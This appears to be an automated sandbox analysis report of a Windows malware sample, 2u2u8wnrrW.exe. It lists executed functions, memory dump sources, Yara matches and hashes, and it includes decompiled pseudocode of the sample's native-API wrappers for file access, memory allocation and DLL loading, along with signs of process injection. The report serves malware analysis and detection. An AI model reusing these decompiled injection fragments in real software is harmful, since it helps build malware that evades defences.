                                                            Uniqueness Score: -1.00%

                                                            Function 019CA313, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,019CA171,00000800,00000000,00000000), ref: 019CA382
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: f0170accebf8d87cb7e505cfe184adbfa9c06b24b5cba729d237a6d51a40d129
                                                            • Instruction ID: 92ab465edd3d813ba027386a9136e4f20d4183234d06d8f655ed3d039cabd7fe
                                                            • Opcode Fuzzy Hash: f0170accebf8d87cb7e505cfe184adbfa9c06b24b5cba729d237a6d51a40d129
                                                            • Instruction Fuzzy Hash: 611126B68003499FDB10CF9AD884ADEFBF8EB88724F14842ED559A7700C379A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 080D1420, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 080D148E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: aed75d5b869e70b39c8134d55fc990c7338a6a945a33f543282a805019ac8f3c
                                                            • Instruction ID: df5e42c2255cb551f209bc1538249df71e8920b4d15c262706d4d4007054eff3
                                                            • Opcode Fuzzy Hash: aed75d5b869e70b39c8134d55fc990c7338a6a945a33f543282a805019ac8f3c
                                                            • Instruction Fuzzy Hash: C41156728003489FCB10DFAAC844BEFBBF9AF88324F14881AE515A7210CB759950CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 080D1298, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 10d4ec318a75e3b198d3a7add36910392a845375403aaf3a841a34819b547794
                                                            • Instruction ID: 0d6dc656cf6e65616588e42d8ca199b57a903e3c235cef9e09029dd274440904
                                                            • Opcode Fuzzy Hash: 10d4ec318a75e3b198d3a7add36910392a845375403aaf3a841a34819b547794
                                                            • Instruction Fuzzy Hash: 86113A719003488BDB10DFEAD4447EFFBF9AF88224F24882AD419A7640CB75A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019CA090, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 019CA0F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 9a481ea50a7b5b0ea2ee452a50401390a96ff15d83794a041a0745e3c72f049b
                                                            • Instruction ID: ed0753f7f8200e5b009ae02195c1565aed3a9c306b78b8702ba1ba1b21b9383c
                                                            • Opcode Fuzzy Hash: 9a481ea50a7b5b0ea2ee452a50401390a96ff15d83794a041a0745e3c72f049b
                                                            • Instruction Fuzzy Hash: 9611D2B5C006498FDB10CF9AD844ADEFBF8AB89624F14841ED459B7600D375A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 080D16BC, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 080D40DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.378281958.00000000080D0000.00000040.00000001.sdmp, Offset: 08080000, based on PE: true
                                                            • Associated: 00000000.00000002.377823942.0000000008080000.00000004.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: a7edd5041bdf981becc1ce4aff183a4b465019f6914281f10edb318385936990
                                                            • Instruction ID: b9432086642dfd55ba2d552398a75cebe2765466fd115023713cb7ac347bca71
                                                            • Opcode Fuzzy Hash: a7edd5041bdf981becc1ce4aff183a4b465019f6914281f10edb318385936990
                                                            • Instruction Fuzzy Hash: C01103B58007499FDB20DF9AD884BDEFFF8EB48324F208459E914A7600D375A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0192D1D8, Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374275918.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afc41b11311e9bfea6f0f223058ca34c2c5183415bc3403afd02d46fb57c344c
                                                            • Instruction ID: 8b79fb051228c64d1fd8fb81a832777c4be6a2fb6c3678cbe13c58602505b8be
                                                            • Opcode Fuzzy Hash: afc41b11311e9bfea6f0f223058ca34c2c5183415bc3403afd02d46fb57c344c
                                                            • Instruction Fuzzy Hash: 1321F871504340DFDB05CF94D9C4F16BBA9FB89324F24C969E9094B24AC336D456CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0192D4A0, Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374275918.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f179ef75382ff7bd561eaeeaf0be4f964d575f77f8df3384d445ffe4a681352d
                                                            • Instruction ID: 4c8d9cd4ab986c980c47b264fe096eb8086194ce11306f4f31af1f6c33fa0358
                                                            • Opcode Fuzzy Hash: f179ef75382ff7bd561eaeeaf0be4f964d575f77f8df3384d445ffe4a681352d
                                                            • Instruction Fuzzy Hash: 48210671504240DFDB01DF94D8C0F56BFA9FB84328F248969D9090B25EC376E856C7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0193D01C, Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374299450.000000000193D000.00000040.00000001.sdmp, Offset: 0193D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f71aacdf7170cefb49a7901782953c3bd1b31ad002739559bbf177432a40aab0
                                                            • Instruction ID: 7fb713a7e53c181967b3f73fedd7d98681bfa6b9337f00b3030a71a7de6f6d47
                                                            • Opcode Fuzzy Hash: f71aacdf7170cefb49a7901782953c3bd1b31ad002739559bbf177432a40aab0
                                                            • Instruction Fuzzy Hash: 07210071604240DFDB11CFA4D8D0B26FBA9FBC4664F64C9ADE80D0B286C336D807CA62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0193D006, Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374299450.000000000193D000.00000040.00000001.sdmp, Offset: 0193D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b97f3038d6d150c7386c2271e3d6876e28737b32eb25e807378dd641ba851e1d
                                                            • Instruction ID: 60d8a83cc1f1733bb44f7e1d9831efc2949f91c92f90b03edf81fcc71f8a6f28
                                                            • Opcode Fuzzy Hash: b97f3038d6d150c7386c2271e3d6876e28737b32eb25e807378dd641ba851e1d
                                                            • Instruction Fuzzy Hash: CA2171755093808FCB02CF64D590715FFB1EB86214F28C5EAD8498F697C33AD80ACB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0192D1D3, Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374275918.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e448983add2b75c4d9d4248bb742e35cb6b09de67a0a6879324b1a06f128976
                                                            • Instruction ID: 92c8d12c8c6a23996a0fdc84d9e807d18add0d00f86d54a925dae363de7a7df1
                                                            • Opcode Fuzzy Hash: 9e448983add2b75c4d9d4248bb742e35cb6b09de67a0a6879324b1a06f128976
                                                            • Instruction Fuzzy Hash: 3721DF76404280CFCB02CF44D9C4B16BFB1FB85320F24C2A9DC084B65AC33AD42ACBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0192D49B, Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374275918.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36cc6787acc68c621cbc9d387a17b068bad558ebf863b95d458dde53614fc572
                                                            • Instruction ID: 0e478510e48466d6a13288afbe88f40ee47c184ef8b9ceae06a79fb854d286cf
                                                            • Opcode Fuzzy Hash: 36cc6787acc68c621cbc9d387a17b068bad558ebf863b95d458dde53614fc572
                                                            • Instruction Fuzzy Hash: 0611B176404280CFDB12CF54D5C4B16BFB1FB84324F24C6A9D9090B65BC376D45ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0192D731, Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374275918.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0735d78bf296dddc6aad5f51b4849059c91c97b800bafa50245bb64271909194
                                                            • Instruction ID: 9ff09e3bb0bd2fcfb488b06b1e2ef409ed1774688d6e7f2df7971bdc99c7cca8
                                                            • Opcode Fuzzy Hash: 0735d78bf296dddc6aad5f51b4849059c91c97b800bafa50245bb64271909194
                                                            • Instruction Fuzzy Hash: 8F01F7B14083D49AE7108AA5CCC0BA6BBDCEF40234F18885AED0C4F28AC37C9840C6B2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0192D730, Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374275918.000000000192D000.00000040.00000001.sdmp, Offset: 0192D000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9b8fffd963533d5ce07c481c758f830179e5498de8293dcc09b8e3b6dade00f
                                                            • Instruction ID: 4e48ebc0392a217e356825f4e7c9df3035ed81a8282235b6cd662128588491f0
                                                            • Opcode Fuzzy Hash: c9b8fffd963533d5ce07c481c758f830179e5498de8293dcc09b8e3b6dade00f
                                                            • Instruction Fuzzy Hash: 2FF04F724042949AE7118A59CDC4BA2FFDCEB81635F18855AED085B686C2799844CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 019CF090, Relevance: .3, Instructions: 315COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b30acbd05dc1f4fb54c82823ba1c7ebfa213979b48373faf80d320477e983be
                                                            • Instruction ID: 4c118ce59459d28322e3a88421c71aca5c7a697ed6f623ee9c741104e54f944f
                                                            • Opcode Fuzzy Hash: 8b30acbd05dc1f4fb54c82823ba1c7ebfa213979b48373faf80d320477e983be
                                                            • Instruction Fuzzy Hash: DC12F3F9419746CBF730CF65E9882893BE1B74532CF968208D2612FAD9D7B8114ACF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019CCCCC, Relevance: .3, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c9887a36e0c151d75d44ffe566588a2d76f25732ac2c494ab5c3748315ddec1
                                                            • Instruction ID: 411bd9352c0dbd76bc03c6f57427efea007eece07b58385e5937fb69ddf02732
                                                            • Opcode Fuzzy Hash: 9c9887a36e0c151d75d44ffe566588a2d76f25732ac2c494ab5c3748315ddec1
                                                            • Instruction Fuzzy Hash: EBA18E32E0020A8FCF15DFA5C8445DDBFB6FF85701B15856AE90ABB261EB31A905CF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 019CF083, Relevance: .2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.374438659.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7527e204c5889774ad7853e53344b47494fbe10238f93bdb6a70af18af0fb86b
                                                            • Instruction ID: 4e80976a0ddfbf8beac556cedcc1a4164ce693580a12dfdc5873c129c2a011d4
                                                            • Opcode Fuzzy Hash: 7527e204c5889774ad7853e53344b47494fbe10238f93bdb6a70af18af0fb86b
                                                            • Instruction Fuzzy Hash: 6CC149B9819746CBF720CF65E8882893BE1FB8532CF568208D2616F6D9D7B41446CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: 2u2u8wnrrW.exe PID: 7164 Parent PID: 6996 2u2u8wnrrW.exeCOMMON

                                                            Executed Functions

                                                            Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E004186A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191F0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a41
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}






                                                            0x004186a3
                                                            0x004186af
                                                            0x004186b7
                                                            0x004186bc
                                                            0x004186e5
                                                            0x004186e9

                                                            APIs
                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: A:A
                                                            • API String ID: 2738559852-2859176346
                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                            • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                            • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041871A, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E0041871A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("repne daa");
				asm("in al, dx");
				asm("popad");
				asm("loope 0x35");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                            0x0041871a
                                                            0x0041871c
                                                            0x0041871d
                                                            0x0041871e
                                                            0x00418723
                                                            0x00418726
                                                            0x0041872f
                                                            0x00418737
                                                            0x00418745
                                                            0x00418749

                                                            APIs
                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                                            • Instruction ID: 9a256857486c6b04dc2d8d01bbab50f47954425687f1d86c7330f0437a7ebe71
                                                            • Opcode Fuzzy Hash: 3f8948348d103bbf2167bc1e43380d1d699537c023ddb6a6c82993a46c3b1a7f
                                                            • Instruction Fuzzy Hash: E5014876200208BBDB14DF99CC85EEB77A9EF88314F118559BA18AB242C630E9548BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00409B50(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;

				_t32 = __esi;
				_t31 = __edi;
				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t34 = _t33 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t35 = _t34 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620(__ebx,  &_v12, 0);
						_t35 = _t35 + 8;
					}
					_t18 = E00419730(_t31, _t32, _v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}















                                                            0x00409b50
                                                            0x00409b50
                                                            0x00409b6c
                                                            0x00409b6f
                                                            0x00409b74
                                                            0x00409b79
                                                            0x00409b83
                                                            0x00409b88
                                                            0x00409b8b
                                                            0x00409b8d
                                                            0x00409b95
                                                            0x00409b9a
                                                            0x00409b9a
                                                            0x00409ba1
                                                            0x00409ba9
                                                            0x00409bac
                                                            0x00409bae
                                                            0x00409bc2
                                                            0x00000000
                                                            0x00409bc4
                                                            0x00409bca
                                                            0x00409b7e
                                                            0x00409b7e
                                                            0x00409b7e

                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                            • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                            • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004185EB, Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004185EB(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				void* _v117;
				long _t27;
				void* _t38;

				_t21 = _a4;
				_t6 = _t21 + 0xc40; // 0xc40
				E004191F0(_t38, _a4, _t6,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t27 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t27;
			}






                                                            0x004185f3
                                                            0x004185ff
                                                            0x00418607
                                                            0x0041863d
                                                            0x00418641

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                                            • Instruction ID: eadccef6660383827a1c39e062733e9e7291f8de244501940662f3f68da9609a
                                                            • Opcode Fuzzy Hash: 2386a416c0c71fdbb8baf5cb321fbb8465dc82a6776198798f5900b2a69635ef
                                                            • Instruction Fuzzy Hash: B501AFB2245108AFCB08CF99DC95EEB77A9AF8C354F158248FA1D97241D630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                            0x004185ff
                                                            0x00418607
                                                            0x0041863d
                                                            0x00418641

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                            • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                            • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004187CA(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t17;
				void* _t28;

				_t13 = _a4;
				_t4 = _t13 + 0xc60; // 0xca0
				E004191F0(_t28, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}





                                                            0x004187d3
                                                            0x004187df
                                                            0x004187e7
                                                            0x00418809
                                                            0x0041880d

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                                            • Instruction ID: baafc16d0dcc65a97a2a7081ec653fa0cdbc2bd5867fea8e6554ff1b4ee91aef
                                                            • Opcode Fuzzy Hash: c7d2bccebaee648065e03798fb1cb71dd486367c3b38807e6fe45ebb4ffa1175
                                                            • Instruction Fuzzy Hash: B9F08CB2200108AFDB14DF88CC80EEB73ACFF88304F108149FE4997241C630E851CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                            0x004187df
                                                            0x004187e7
                                                            0x00418809
                                                            0x0041880d

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                            • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                            • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                            0x00418723
                                                            0x00418726
                                                            0x0041872f
                                                            0x00418737
                                                            0x00418745
                                                            0x00418749

                                                            APIs
                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                            • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                            • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: InitializeThunk
